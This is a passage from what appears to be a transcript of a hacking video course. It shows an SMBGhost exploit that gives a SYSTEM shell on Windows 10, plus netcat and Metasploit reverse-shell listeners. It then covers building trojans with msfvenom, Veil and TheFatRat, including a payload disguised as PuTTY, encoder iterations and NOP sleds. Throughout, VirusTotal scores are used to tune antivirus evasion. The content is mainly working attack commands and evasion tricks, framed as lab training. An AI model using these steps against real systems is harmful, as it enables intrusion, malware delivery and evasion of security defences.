can do is we can navigate using our terminal to that tool, so cd desktop and then cd cve. If I type dir right here and I run the bat file, of course you can run it using command prompt, or you can just double click on this file and double click on the calculate target offsets. As we can see, this will open another terminal, and this will give us those 5 offsets for this particular Windows 10 version. What we must do right now is we must change these offsets to match inside of our Python file right here. So let's check it out. Here we got 2D170. The first one is the same. 32210. The second one is also the same. The third one also appears to be the same. The fourth one is different. Here it ends with 370 and here it ends with 410. So let's change that first. Let's type it 370. And the last one is also different. So here it is BAFA8, and here, if we change it, BAFA8, now everything is good. So if we Ctrl O to save this exploit, now we should have a working exploit. We can close this, we don't need it anymore. We can also close this, and if I go back to the page to check out the next step, it tells us run Nccat with the following command line arguments. So the purpose of running Nccat is because once we exploit the target and we run the payload, it must connect to somewhere. Now, this listening for the incoming connection, Metasploit Framework did for us automatically. Right now, we must do it ourselves, and we're going to do it with the help of Nccat. So to listen for the incoming connection, we can type nc and then -lvp and then the port number. In this case, let us listen on port 4444. This will listen for the incoming connections, and once we run the exploit, the target machine will try to connect back to this port number right here on our IP address. Therefore, right after it we should have a shell pop-up right here, and we should be able to execute commands on target machine. Great. Let's check out the next step. The next step is to run the .py file while following the command line arguments. So the command that we must run is the file name, then the target IP address, then the Kali Linux IP address, and then the port that we're listening on. And this reverse shell IP is just the IP address of the machine that you're listening for the incoming connections. And you get the explanation right here as well. So let's try it out. We're listening right here already, and let us run the file right here. We're going to use Python 3, smb bleedingghost.py, then comes the target's IP address, which is in my case 192.168.1.5, as it says right here. Then comes the IP address on my Kali Linux machine, and I'm going to check it out inside of a third terminal real quick. It is .1.12. So let's type it right here, and the last step is to specify the port number that we're listening on, and in our case that is the port 4444. If I press enter, we get an error that says no attribute WinDLL. And I knew this error will come up. The solution to this is to run the exploit from a Windows machine. So this file right here must be ran from another Windows machine, and then we can redirect the connection to this Kali Linux machine to pop a shell.
Are you scared?
Why is that? Well, this C-types library has no attribute WinDLL, which is only to be ran in a Windows environment, I believe. So let's test it out. For this, I'm going to use my main Windows 10 machine right here to run the exploit, and I will redirect the connection, once exploited, to the Kali Linux machine that is already listening for the incoming connections. Now I know, it sounds a little bit complicated, but let's give it a try. I already downloaded the exploit right here. Here is the file containing all of the other files. And if I open my command prompt, then I navigate to this directory right here containing the exploit. What I'm going to do is I'm going to run the exact same command that I ran previously on my Kali Linux machine, just this time I will be running it from my main Windows 10 machine. So the IP address of the target is first, then comes the IP address of the machine that is listening for the incoming connections. And this might sound confusing, but this is still the IP address of our Kali Linux machine. If you want, however, you can also connect back to this Windows 10 machine, but in that case you must install Netcat for Windows and listen using Netcat from a Windows machine. And then right here you would specify the IP address of the Windows 10 machine that is running the exploit. Since there is no need for me to do that, I will just specify the Kali Linux IP address, and the port number is 4444. Great, the command is here, and if we execute it, it will start the exploit, and sometimes this exploit will crash the target, as we can see right here. The first try of running this exploit crashed our target machine. And this is something that you must get used to once running these type of exploits. So what I'm going to do is I'm going to Control-C this to quit this exploit. And then what I'm going to do, clear the screen using CLS command, and I will run this command once again. Just I will wait for this Windows 10 machine to boot up once again. And we're going to give it a second try. And now that we're logged in, I will run the command once again. Now there is a chance that it will crash once again, but hopefully it will not. And here it is, it crashed once again, so I'm just going to restart it again real quick and then run the exploit for the third time. Hopefully the third time it will work. Okay, here it is, and hopefully the third time will be our lucky run. Let's run the exploit. For now everything seems to be working. We haven't reached this point in the past 2 tries, so hopefully right now the target will not crash. And what we're looking for at the end of this is, after the exploit is done, we're looking to gain a shell right here inside of our Cal Linux machine. So let's wait for this to finish. It tells us right here, wrote shellcode. And if I go to my Cal Linux machine, here it is. We got the shell on our Windows 10 target machine. If I type who am I, we are the system level account, so we're the highest level account possible. If I type ipconfig, just to check whether we have the same IP address, and that indeed is the same machine. So we successfully exploited the Windows 10 target machine. Just for this we had to use a Windows machine to run the exploit, because of some libraries inside of the Python file. And if you notice right here, it tells us that if we disconnect and if we exit this exploit, the target will probably crash. So what we would want to do is we would want to execute all of the commands that we want to execute, do what we need to do on the target machine, and then after we've done and we've exited the shell, we can go right here, stop the exploit, and once this exploit has been disrupted, that will again crash the target machine, as we can see right here. Just this time we managed to run the shell, we managed to execute commands on the target machine for as long as we wanted before crashing the machine. So the goal right here is to first gain the shell, and then the machine will crash, and not crash the machine at the beginning of the exploit. But that is something that we do not have control of. So sometimes you will gain a shell and sometimes you might crash the target machine. Okay, great. So we successfully exploited Windows 10 machine. We did it manually, with the help of tools that we found online. We also set up our own listener that was waiting for the incoming connections, and right now that we covered all of these vulnerabilities, starting from the next video, we're going to see how we can attack targets that do not have any vulnerability. So we're going to see how we can generate our own payloads and how we can deliver them to the target machine. See you in the next video. Okay, it is time we see how we can gain access to the secured systems. In the previous few videos, we talked about and we attacked machines that had some vulnerability inside of them, whether it was the operating system vulnerability, an outdated software or weak credentials. We managed to exploit them through those vulnerabilities and gain access to them. But now let's see what happens if our target doesn't have any known vulnerability. What now? Well, remember I told you that the process of attacking is rather the same in this case. We want to deliver the payload to the target and execute it. Just while the target had a vulnerability, we did this through an exploit, and through that vulnerability we managed to execute the payload ourselves. Now it becomes harder. We must deliver the payload to the target using some other method, and the target has to execute the payload themselves. That is the hard part. The way you deliver the payload is completely up to you, whether it is over an email or over some HTTP page, over an USB drive, it doesn't matter. What matters is that the payload ends up on their machine and they double-click and run it. For now, let us focus on just creating the payload and running it to see if it works. For this, I will use Cal Linux machine to create the payload, and I will execute it on my main Windows 10 machine. You can run our payloads on the Windows 10 machine that we installed in the previous section, or you can use any other Windows machine whatsoever. It doesn't even have to be a Windows 10. It is completely up to you. Just one thing that we must make sure is that Windows Defender and antivirus software are turned off. Why? Well, we're going to be creating a payload using MSF Venom tool from the Metasploit Framework, and since many people use the exact same tool to create the exact same payloads as we will right now, those payloads are well known to every antivirus software and they will get detected quickly. However, for now our goal is not to bypass antiviruses but to just create a payload and get it to work. So turn off your Windows Defender, and I will do it right here as well. You can go to this arrow, click on the Windows Defender, and the one thing that we want to turn off is under this virus and threat protection. We want to go to the manage settings and turn off the real-time protection. It will ask you for the administrative password, and once you type it in, it will turn off the real-time protection, as it says right here. So I will close this, and now let's create our very first Trojan. As already said, for this we'll be using a tool called MSF Venom, so I'll open a terminal right here. Why we are using MSF Venom? Well, it is a known tool and it is used to generate payloads really fast. In just one command, we will be able to generate a program that will gain us an access to the target system. So let us see how we can create a simple one first. If I type the command msf venom-h, right here we are going to see our available options with the MSF Venom. And up here we also get examples of usage which tells us how we can generate a simple payload right here. Let's follow the example and try it out. Now, it tells us right here that to run the MSF Venom, we need to specify the entire path right here. But instead, we can just specify MSF Venom. It will still recognize it as the tool that we need, and we can write our options right after it. So let me clear the screen so we can see the command better. And if I go and type MSF Venom, we want to use the -p option, and this -p option stands for payload. So here we specify which type of payload are we creating. In my case, since I'm going to be attacking this Windows 10 64-bit machine, I want to generate a Windows/x64/meterpreter/reverse TCP payload. I'm using a 64-bit because my machine is a 64-bit machine, and I'm using a reverse shell connection. Another option that we must specify is the lhost, and lhost is the IP address of your Cal Linux machine. So 192.168.1.12. In my case, I will just double check it, so sudo ifconfig test1234 is my password, and here it is, the IP address is correct. Great. Another option that we must specify is the local port, and by the way, this lhost stands for localhost, not sure if I mentioned it. And the local port is the port that the target will connect to. In our case, we can set that to be any port that we want. For example, let's use 5555. After that, we can use the -f option to specify the file type that we want to create. So since we are attacking a Windows machine in this video, I'm going to be creating an exe file. So I will just type -f and then exe, and the last option that I want to specify is -o. And this -o stands for output. Here we specify the name of the file. I will just call it shell.exe. This is all we will specify for now. So once again, we are creating a 64-bit payload for the Windows target. We set the local host, which will be written inside the payload, so the target can connect to our Cal Linux machine. And we also specify local port to which the target will connect to. After that, we mentioned that the file type will be .exe, which is an executable for Windows. And at the end, we output all of this with the name of shell.exe. Let's press enter. And here it is. Our payload is right here on our Cal Linux desktop. Here we can see it, shell.exe. This program, once executed on the target machine, will grant us an access and give us the meterpreter shell on that machine. Let's move it real quick to the target machine, and this is something that you can do however you want. You can plug in the USB device by going in Cal Linux, then on the devices, then USB, and select the USB device right here. Then you will transfer it to the USB device, and from the USB device you will transfer it to your target Windows machine. Or you can also go to the devices, click on drag and drop, and set to bidirectional. This simply means that you can just copy the file from the Linux desktop and paste it or just drag it to the Windows 10 desktop, in my case. In case you're using another virtual machine that you're attacking, you can just copy it first to your main machine desktop and then from the main machine desktop copy it to the desktop of your virtual machine. Just make sure that in the target virtual machine you also set the drag and drop to bidirectional. Great, now we got our shell.exe or our payload on the target machine. Great, but we're not done yet. Remember that this shell will attempt to connect to our Cal Linux machine once executed, since it is a reverse shell, and it will connect on the port 5555. In order for connection to be established, we must be listening on that port and have it open in order for target to even be able to connect back to us. This is something Metasploit Framework manually configured for us once we performed our exploitation of a vulnerability, but right now we must do it manually. And we can do it with the help of MSF console as well. So what I'm going to do is I'm going to start the MSF console. And once it opens up, I want to type use exploit multi and then handler. And this is not an actual exploit. You can imagine this as something that will listen for the incoming connection from our payload. It is also called a listener. So let's set it up. If I clear the screen to see it better and type show options, there is only one thing that we need to set, and that is the payload. So the payload in this bracket must match the payload that the target will execute. So let's change set payload to Windows x64 interpreter and then reverse TCP. Show options once again. And we must set the lhost and lport to match from the msf1m command, so set lhost to be the IP address of my Cal Linux machine, which is .1.12, and set the lport to be 5555. Once we set up all of these settings, we can run it. So I will just type run. We can see it is now listening for the connections and nothing else is really happening right here. Why? Well, because the shell on the target system hasn't been ran yet. So let's run it on Windows machine. Double click. And you will see nothing is opening, but if I go back to my Cal Linux machine, here it is. Here is our Meterpreter session open. And it is identical to the ones that we had during our vulnerability exploitation section. Just this time, we created and delivered it manually, and we also manually set up our listener. Keep in mind that this didn't exploit any vulnerability. We are just relying on the mistake from the other person that is using target machine to execute our file. Otherwise, if the file doesn't get executed, we don't get access to their machine. And another thing to keep in mind is that listener, or in our case this multi-handler that we have, must be ran before the payload, or before this shell.exe, which is kinda logical, since if the target runs our file and we weren't listening for the connection, then they won't be able to connect to our machine. You can also notice on target's desktop once again, nothing is really happening, so they might think that the program they executed didn't work and they won't question it that much. But of course we got the connection right here and we can use all of the commands that the Meterpreter gives us. We can, as usual, enter a shell, type whoami, type ipconfig, and all the other commands that we can execute. Type dir to check out all of the available files on the desktop. And if I exit this, exit out of the Meterpreter shell, since we successfully gained access to it once again. But keep in mind that, of course, this was just a basic example, and we will see in the next few videos how to create a little bit more complex payloads. See you in the next video. Welcome back. Let's get back to our payload creation. So, in the previous video, we saw how we can create a simple .exe Trojan using MSF1m. we use the basic options, where we only set localhost and local port. Now let's check out some other options that we have available. If I go and open up my terminal and run the command msf -h, we will get our help menu. And the purpose of all of these other options that we can see right here will usually be to either bypass an antivirus or to make your payload smaller in size or something similar to that. Basically, it is used for creating a payload for your own needs. For example, in the previous video, we created a payload that was a Windows Meterpreter shell as an exe file. But we can create other file types if we want. To check out what other file types can we create, we can run the command msf -list formats, and it tells us that right here under the -f command. We can use -list formats to list all of the available formats. So let's do that real quick. -list and then formats. This will take a few seconds to execute, and seeing this will be really useful. Why? Well, imagine you were sending a payload to a Linux machine. An exe file wouldn't be much useful then, right? However, a Python file could be of use in that case. Well, msf allows us to create any file type that we want. So let's check out all of the available file types. So up here, we can see we can create ASP, DLL, exe, some other file types as well. We can go down here, we can see different programming languages such as C, C#. We can create in Perl, in PowerShell, in Python. We can also do Ruby, SH, and many other file formats if we want. And what I also want to show you besides this is different options that are also useful, whether it is for bypassing antivirus or changing the size of your payload. Let us check them out. So let's create a couple of payloads right now and compare them. Let me clear the screen first, and to compare them we're going to use a site called VirusTotal. And to do that, and to visit the site, we must open the Firefox. And what VirusTotal is a website where you upload your viruses and they will tell you how many antivirus vendors are able to detect it as a malicious program. So if I open VirusTotal by typing VirusTotal right here, go to the first link, which is this one, virustotal.com. And one thing to keep in mind is that every file you upload to this website is sent to the antivirus vendors. So something that might be undetectable today, after uploading it to this website, it will for sure become detectable in a few days or a week. Are there other websites that don't send your files to antivirus vendors? Yes, but they are not as good as VirusTotal. And we already know that undetectable virus is a game of cat and mouse. Today it's undetectable, tomorrow it isn't. So this isn't really something to worry about right now. Let's create two payloads real fast. So the first one that we are going to create is going to be the one from the previous video, so let's do it real fast. We already know how to do that. It will be a 64-bit payload, Meterpreter, reverse, TCP. Lhost will be equal to the IP address, so let's check it out real quick. .1.12, and if I specify it right here, Lport can be 5555, it doesn't really matter. The format will be exe, and the output we can save it as shell1.exe. Press enter, and as soon as this finishes, we're going to upload this payload to the VirusTotal to see how many antiviruses detect it as a malicious program. So it has finished. Let us go to the VirusTotal website, click on choose a file, navigate to the desktop directory and select shell1.exe. I will double click it, I will confirm the upload, and it will upload the shell for me. Now this scan will take a minute or two. So while that is doing, what we can do is we can create our second payload, and to create the second payload we're going to use some additional options. So I will clear the screen right here, and I will type msf-h right here, so we have the help menu available. Then I will go right here and run the command msf-venom. We will use the same payload, which is Windows x64 Meterpreter. /reverse TCP. We will select the local host, 192.168.1.12. Local port will be 5555. After this, we can use the -A option to select the payload architecture. As we can see right here, -A stands for the architecture to use for the payload. So let's go and select x64, because in my case I'm attacking a Windows 10 64-bit machine. If your Windows machine is 32-bit, you can proceed with x86. Okay? The next thing that we are going to use is a very interesting thing, and that is an encoder. And what is an encoder? Well, let's go right here and find the -E option, which says right here the encoder, and what we need to specify after it is the encoder that we want to use. Encoders can help us bypass some of the antiviruses. To list all of the encoders that we have, we can use -- list encoders. So let's do that first. So MSF Venom -- list and then encoders. And here they are. We get a bunch of encoders for x86 or for 32-bit architecture. We get some for the x64 or 64-bit architecture, and we get some other encoders up here as well. Now the ones that we're interested in at the moment are these x64 ones. So we're going to go with this one, x64/Zuto_Dekiru. So let's copy its name right here and paste it after the -E. Now if we go back to the help menu and go back to the encoder, another option that is closely linked to the encoder is this -I option, and it is the amount of iterations. As it says in the description, this is the number of times to encode the payload. So if I go right here, after selecting the encoder, we want to select -I to specify the number of iterations that we want to encode our payload. Now, the more iterations, the bigger the payload will be in size, but it also might mean that it will be less detectable to the antivirus vendors. So let's specify -I and then let's perform 15 iterations, for example. After it, we're going to specify the platform on which the payload will run, which is Windows. And after it, we're going to use the -N option and select 500. Now to see what this -N option is, we can go right here, and in the -N we can see it is a knob sled. It will prepend a knob sled of length size onto the payload. Remember what a knob is? A knob is an instruction for the processor to not do anything. And here we are simply just telling how many knobs we want to add to our payload. Once we select a bunch of these options, we can add at the end -F to be an exe and -O to be shell2.exe. So this is our second shell. Let's run it and wait for MSF Venom to create our payload. And while it is creating the payload, let's go to the virus total and see how many detections we got with the regular Meterpreter shell. So of 68 antiviruses, 43 detected this as a malicious program. And here we can see which ones detected it as a malicious program and which ones didn't. Let's see whether we get any better result using the second shell. So we can see right here, it has been created, successfully added knob sled of size 500 from x64 simple. The final size of the exe file is 8000 bytes. So let's go to virus total and remember this number, 43 out of 68, and let's see whether we can at least bypass a little bit more antiviruses than from this first scan. Let's select the shell2.exe, confirm the upload. Now, while this is scanning, let me tell you something real quick. With the MSF options, don't expect to get much better results once applying some additional options or something like that. As I already mentioned, the MSF Venom is a really known tool, and everyone uses these options to generate payloads, so they are very well known to all the antivirus vendors. Here we can see our second shell is scanning, and let's see whether we get a lower number than 43. And here it is, the scan has finished. Right now we get a number of 38 out of 67. So we successfully managed to bypass 5 additional antivirus softwares using the additional commands that we added to our MSF Venom payload. However, let's try to make it even less than this, just by using the MSF Venom. There is another option that we can do, which is -X. And if we go to the help menu right here, we can see that -X stands for template. X allows us to use another program as its template. In other words, this means we can make our payload look similar to that other program. Now, this sometimes knows not to work, but let's give it a try and see whether we manage to bypass more antiviruses with this. For this we can use any program that we want. I'm going to go with the program called PuTTY. So I'm going to go right here and type PuTTY. You can use any other executable file that you want. And under the download PuTTY, I will click on that link. It tells me you can download PuTTY here. I will click on here. And if I go all the way down, I'm searching for the executable file, so .exe, and here it is, 64-bit putty.exe. I will click on this, and I will save it in my downloads folder. Great, I will click on OK, and if I go right here, open the downloads folder, here I will have the PuTTY executable. And just in case you don't know, on Windows, PuTTY executable looks like this. So it has this icon and it is called putty.exe. Remember how it looks? Let me just delete it real quick, and I will open terminal in my downloads folder and run the command msf venom -p. I will use the 64-bit meterpreter _reverse TCP, L host will be 192.168.1.12, L port will be equal to 5555, and I will only add the -X option and select the program of putty.exe. Now if you're using some other executable, here you specify the name of the other executable, just make sure that you're located in the same directory where that executable file is, in order to run this command. After that I can specify that it is format of exe and output will be capital putty.exe. Press enter. So the creation of the payload has finished, and if I go and show you how the payload looks like on the Windows machine, let me just find this, and if I go and copy the PuTTY with the capital P to my desktop, here we can see it looks exactly the same as the previous file that I showed you. Just in this case, this is our meterpreter shell. Let me show you real quick. If I go and open MSF console and I set up the multi-handle listener, so multi-handler, set payload to be Windows x64 meterpreter /reverse _TCP, set lhost to be 192.168.1.12 and set lport to be 5555. I type run here, and then I run this putty.exe, go back to my Cal Linux, and we will have the meterpreter session 1 opened. Get user ID will tell me that I'm this Windows 10 machine. Okay, great, but this is out of the scope for this video. Let us check out what detection rate does this newly generated payload have. So let's go right here, choose file, navigate to downloads, because there is where our putty.exe is, select the payload and confirm upload. And let's see if we generate a payload with a template, do we manage to bypass more antiviruses than with the previous two payloads? And it seems that we do. In the previous one we had 38 out of 67, right now we have 29 out of 69. So we managed to bypass additional 8 antivirus vendors. Great, this looks better than the last two. I'm going to Ctrl-C this or just close this, and of course if you wanted to generate a fully undetectable payload with MSF Venom, you can always change the file format, but that comes with other problems. Let me show you real quick. So if I go right here under the downloads, and let's say we wanted to generate a Windows payload, but not as an exe file, but as a Python file. We can run the command msf venom -p Windows x64 meterpreter /reverse TCP. lhost equals 192.168.1.12, lport equals 5555. -f is something that we want to change, so it is no longer going to be exe, it is going to be a Python file. And we output it with -o as a Python _payload .py. Press enter and this will create the Windows Meterpreter payload just as a Python file. Here it is done, and if we go to VirusTotal, upload the Python payload right here, confirm the upload, and we can see no antivirus is able to detect it as a malicious program. It is FUD, or in other words, it is fully undetectable payload. However, how are you going to run it on the target machine? Windows machines don't have Python installed by default like Linux machines do. So this payload would only be useful if the target machine has Python installed. Otherwise it is completely useless as it cannot run without Python. Okay, great. We covered MSF Venom and some of its commands. I advise you to experiment even more with the MSF Venom, and for example you can start creating other payloads if you want. We only created Windows payloads, but if you have a Linux machine or a Mac OS machine that you want to attack, you can generate payloads for those operating systems as well. To check out all the available payloads that you can create, you can type the command right here, msf venom -- list and then payloads. And here we can see a lot of different ones. We can go up here are only Windows payloads, but if we scroll all the way up, here are Solaris payloads, Ruby payloads, and these are just some programming languages. But here, if we scroll all the way up, we get to the OSX payloads. So you can attack OSX operating systems. If we go even more up, here are Linux operating systems and Linux Meterpreter reverse TCP payloads. We also get the bind shell payloads. We get up here the Linux payloads for the 64-bit systems as well. So you can attack any operating system that you want. Great. Now that we took a look at MSF Venom and we covered some of its options, let's also take a look at some other tools that we can use for payload creation. See you in the next video. Welcome back, and right now we are going to check out another tool that is used for generating payloads, and that tool is called Whale. Since it is not installed in Kali Linux by default, we must install it first. To do that, you can open up your terminal, enter the root account by typing in your password after the sudo su, and then after it you want to type the command apt-get install whale. Now, since I already have whale installed, this will not do anything for me, but for you it should start the process of installing whale, and that process might take some time. However, running this command is only the first part. After this installation finishes, you can clear the screen and type whale inside of your root terminal. This will, for me, open up the whale program, but for you it will continue the process of installation. So whale has a bunch of dependencies, and once you run the apt-get install whale, and after it you run the whale program for the first time, it will ask you to install those dependencies. You want to click there yes, and that process will also take some time. It will also have a bunch of pop-up windows right here, where you want to click on next on each one. You don't want to change any of those settings, and after all the installation has finished, you should have whale up and running. Okay, great. After you get whale up and running, we can see right here that we get two available tools. The first one is Evasion, and the second one is Ordnance. And what whale is simply a program that will allow us to generate payloads similarly to the MSF Venom. So let's give it a try. If I type use 1, and you will notice that the commands are similar to the MSF console. So to use one of these options, you can simply just type use 1 or use 2. And since I selected use Evasion, as we can see number 1 is Evasion, it will tell me 41 payloads loaded. And these are our available commands. So we can read information, we can list the payloads, we can use some payload. So let us list our payloads first. And here we can see those 41 payloads. Some of them are coded in Ruby, some of them are coded in Python. We have PowerShell payloads, Perl, Go, CS, C#, C payloads, and we get some auxiliary modules as well. Now, the regular payload that we used in the MSF Venom would most likely be this C Meterpreter reverse TCP.py. It is pretty much the same thing. But since we already covered something similar to this inside of the MSF Venom, let us go with a different payload this time. So let's go with a PowerShell payload. Let's select payload number 22, which is PowerShell Meterpreter Reverse TCP, so we can just type use 22. And after you select the payload, it will give you all of the available options that you can set for that payload before you generate it and create it. Here we can see domain, hostname, lhost, local port, min browsers, min processes, min RAM, processors, sleep time, and these options you can use and change as you like. Some of them might actually help you bypass some of the antiviruses, such as for example this sleep option right here. Sleep this amount of seconds. So whatever we set right here, that amount of seconds our payload will sleep after execution before establishing the connection with our listener. So let's set that right away. Let's set sleep to be 20 seconds. What does this mean once again? Well, once the target executes our program will sleep for 20 seconds, it will not do anything, and then after 20 seconds it will establish the connection with our listener. Another thing that we must set is the local host, and for that we must know our IP address. And it is .1.12, so we'll go right here, type set lhost 192.168.1.12. And if I type generate, as we can see by the available commands right here, to generate the payload, we simply type generate. Press enter. Please enter the base name for the output files, and let's call it our payload, meaning a PowerShell payload. I will click here enter, and the payload has been created. We can see right here language, PowerShell, payload module is the one that we selected, source code is written to this path right here, and we will notice that it is written inside of the .bat file. And Metasploit resource file written to this location right here. And the two things that we're interested in are these two things: the Metasploit resource file and the source code. Now, this source code, which is .bat, is something that we want to convert to exe. Now, even though on Windows systems .bat file is runnable, but this will get triggered by any antivirus program out there. Since it is just a basic code that executes commands, it will get triggered by any antivirus. We want to convert it to exe, and how are we going to do that? Well, we can go to Firefox, and there is a really good tool that is used to convert bat programs to exe files, and we're going to download it from GitHub. So, if I type right here bat to exe or b2e GitHub, and I navigate right here to the first link, I copy the tool. We can see that tool is an actual zip file, so we must unzip it as soon as we download it. So let's go right here, go to the second terminal, let's install the tool on our desktop, and I will type git clone and then paste the link to the tool. After the tool is installed, we can change the directory to that tool, and if I type ls, here is the bat to exe converter as a zip file. To unzip it, we can type the command unzip and then bat to exe, and it will unzip our file. Clear the screen, type ls, and we will get an exe file. Is this a problem? We know that exe files can only be ran inside of a Windows, but remember, we have a Wine program installed. Let's get a quick reminder of what Wine is. Wine is a program that allows us to execute Windows files inside of Linux. So let's give it a try. If I type Wine and then the program name, press enter, let's give it a few seconds, and here it is. It opened the program. So we must set up the program. I will set the language to be English, click on OK, I accept the agreement, of course we're not going to read all of this, then click on next, click once again on next, and click right here on next. After it, on the last step, we can click on install. We want to check right here launch bat to exe converter and click on finish. And here it is, it opened our bat to exe converter. So now what we want to do is this payload that we generated, which is inside of this location as a .bat file, we want to convert to exe using this program. So we must open it inside of this program first. To do that, we want to go onto File and then Open. Now we must go to this location right here. So let's click on this arrow, let's go to the slash location, find var, then find lib. Then the next part is veil, so we must go and find the veil program, here it is. And inside of the output and source is our power payload.bat. Let's double click it and it will open the code of our payload. Here it is, right here. Now we have some of the options right here that we can change if we want to. You can add an icon by checking this and then selecting the icon from your system, but we're not going to be doing that at the moment. Another thing that you can do, you can set the password, you can change the working directory, you can change the exe format to be something out of these four, and I will select to be 64-bit Windows invisible because I'm attacking a 64-bit Windows machine. You can request administrator privileges at the runtime, so this is sometimes good if you want your target to run the payload as an administrator, but keep in mind, once they double-click the program, if this was selected, then they will have to input the administrator password. So that is just another step before they actually execute the program. We're not going to be checking that right now. Another thing that you can do is this packer, you can enable the UPX compression. But enabling this will just trigger more and more antivirus softwares because UPX is a really known packer and it was used a lot to pack malicious programs. So there is nothing really here that we want to change. And once you set all of the settings to your liking, you can go right here on the converter and then on convert. Here you want to select the name of your payload and we can just call it PS payload, standing for PowerShell payload. It is an exe format, so we can just save it. And if I click on OK, it will create our exe file, as we can see down here. Process finished. Here we can see where our file has been saved. It is in /var, libveil output source and then pspayload.exe. Okay, great. Now the next thing that we must do to check out whether this payload works is to run MSF console. And while it is running MSF console, what I'm going to do is I'm going to navigate to the veil directory. So I will open folder, I will go to file system, then go right here to var, navigate to lib, all the way down I will go to veil, then output, source, and here is our PowerShell payload.exe. Let us copy it to our target desktop. So I will just drag it onto the desktop of my target machine, and here is our PowerShell payload.exe. If I go right here, open the Metasploit Framework, and I go back to the veil first, copy this Metasploit resource file, copy its entire path, and type resource, and then paste this. What this is going to do is it will set up the listener automatically that is made for this exact payload. As we can see right here, it started reverse TCP handler on this IP address on this port, and it's doing all of that in the background. So all I'm left to do is execute this payload. Now, in this case, we can see the console of this payload, which is something that we don't really want. It only showed for a brief few seconds, but that is something that you can change inside of your PAT2exe converter. So let's wait for a few seconds, and in just a few seconds we should receive the Meterpreter session. And remember why it is taking so long is because inside of the veil we set 20 seconds to wait before establishing connections. And here it is. We got the Meterpreter session 1 opened. Let's see whether we can execute commands. So if I clear the screen, type sessions, we have one session active, and I will enter it using the -i command, get user ID, and we are on that target machine. We can enter the shell as usual, type who am I, we are this account, and everything seems to work. Great. So we managed to create another type of payload that wasn't the same as in the previous video. And to just prove you that, I can go right here to the virus total, and we can upload the payload to see how many antiviruses managed to detect it. With a regular MSF1 on payload, we got about 53 or 54 detection rate out of 60 antiviruses. Let's see how much we get right now. Let's go and find the payload, and it is once again in /var/lib/veil, in the output folder and in the source folder. Here it is. I will select it, confirm the upload, and we should have a much lower detection rate than with the regular MSF1 on payload. And once again, with the usage of this bad2exe converter, you can change some of the settings and you might even get lower detection rate, but it will never be 0. Why? Well, if I just go right here and I delete the entire code and type some random code, which doesn't do pretty much anything, and if I were to convert this code to exe, it will still get detected by a lot of antivirus vendors. You might be asking why, since this right here is not any type of a malicious code. Well, that is because we're using this tool bad2exe converter, and some antivirus vendors find files malicious even though they might not be, just because you converted a bad file to an exe. That is pretty much the only reason. And we can see right here, we get a much lower detection rate than with the regular MSF1 on payload. We get 27 out of 67. So we managed to bypass about 20 to 30 more antiviruses just by creating a PowerShell payload with Whale instead of using our regular MSF1 on payload. Great, so what did we learn in this video? Well, we covered this tool called Whale. You can experiment with other options as well, and you might get even lower detection rate. We also covered this bad2exe tool that we can use to convert the bad files to exe, and we also know that no matter what type of file we convert to exe, it will still get detected by some of the antiviruses just because we used a tool like this. Okay, great. Now that we covered this, we can proceed with our payloads in the next video. See you there. Welcome back. In this video, I want to talk about yet another tool that we can use for payload creation, and that tool is called the Fat Rat. I know, right? What a name. Anyway, this is a tool that we have available on GitHub, so let's go real quick and download it from the GitHub repository. If I type in the search bar Fat Rat GitHub, it should lead me to this first link where I want to click on, and once it opens this page, we want to copy the link to this tool and git clone it inside of our desktop directory. Now you will notice right here that I already have the tool downloaded, so I will not be cloning it right now. The good thing for this tool is that on the GitHub page, if I scroll down here, we have the commands for the exact installation of this tool. So first we git clone the tool itself, then we change directory to the tool folder, and we run this command right here. Since I already did all of this, you do this first, and then we can go and start the tool. Okay, did you do it? Let's go and start the Fat Rat tool. Now keep in mind, once starting this tool, you must enter the root terminal, and we do that as usual with sudo su command. Once I go there, I will navigate to the desktop and to the Fat Rat directory. If I type ls, we should see this file called Fat Rat, and that is the tool itself. So in order to run it, we can just type its name inside of the terminal. Press enter, and this will start the tool for us. You will notice that the tool is rather similar to all of the previous tools that we used for payload creation, so there is nothing really new here. We're just experimenting with different tools to see what type of payload is best for us. It will go right here through some of the dependencies, and if it doesn't have some of the files that it needs installed, it will automatically install it for you. For me, it already has all of this installed, so it will just prompt me with this warning that says, don't upload the backdoors created with the Fat Rat to the virustotal.com. So we're not going to do that. If the tool tells us to, we're not going to go and upload them to VirusTotal. Anyway, let's see how we can create them, so I will press enter to continue. Here it started the service PostgreSQL, and I will press continue once again. And here it is. This is the main menu. So we got quite a few options right here. We can create backdoor with MSF1, we can create fully undetectable backdoor with FUDWIN, we can create with other programs as well, so this is just a matter of choice. You can also, if you notice right here, create a backdoor of the APK file, which would be for mobile phones. Okay, great. Let us go with any one of these. Let's go, for example, with number 6, which is create fully undetectable backdoor with PWN wins. It says in the brackets excellent, but keep in mind that even though right here it says fully undetectable, it most likely won't be fully undetectable because this tool right here isn't that new. Nonetheless, let us go with number 6 as an option, and you can go with a different option if you prefer. I will just go with this one for the purposes of this tutorial, and here we have also a few different options. We can create backdoor with C, PowerShell and embed PDF. We can create backdoor with C, Meterpreter reverse TCP. We can create exe file with C# and the PowerShell. It says it is fully undetectable 100%. So let's go with that one this time. I will select number 2. It will tell me right here my IPv4 local address, my IPv6 address, and my public IP address right here. So what I'm going to do is I'm going to set the localhost IP to be 192.168.1.12, and I will select the local port to be 5555. Press enter. Please enter the base name for output files. We can call this rat backdoor, just so we know from which program it is. Here it asks us to select which type of payload we want to create, and we're going to go with the good old Windows Meterpreter reverse TCP. So I'll select number 3 right here, press enter, and this should create the backdoor for me. After a few seconds, we should have this output that says backdoor saved to this path right here, and up here we can see the code of our payload. It is inside of C#, and we can see it calls the system function, which executes a PowerShell command. Okay, great. So let's remember this location right here. Matter of fact, let's copy it, and now we can press enter. Now you will notice that this tool doesn't set the listener automatically for us. So what we're going to do is you can either set up a listener based on the information that you specified for the payload inside a second terminal using MSF console, or we can go back to the menu using the number 9, and once it comes back to this menu we can go and jump to MSF console straight from the fat rat with the number 10. Okay, great. While the MSF console is opening, what I'm going to do is I'm going to open another terminal where I'm going to enter the root terminal first and then navigate to the path that we copied. Okay, great. Type ls here and we should have ratbackdoor.exe. Let's copy it to our desktop, so home, Mr. Hacker, and then desktop. And from the desktop, if I go and lower all of these windows, we should be able to copy it straight to our Windows 10 machine. Okay, great. So it is on our target machine. Let's set the settings inside of the MSF console. Use exploit multi-handler. Set payload to be, remember, Windows Meterpreter reverse TCP. And we need to set the L host and the L port accordingly to what we set inside of our payload. So for me it is 192.168.1.12 and the L port is 5555. Press run, and if we go and run our backdoor, it will execute, go back to our MSF console, and here is the Meterpreter shell. Once again, we can execute the 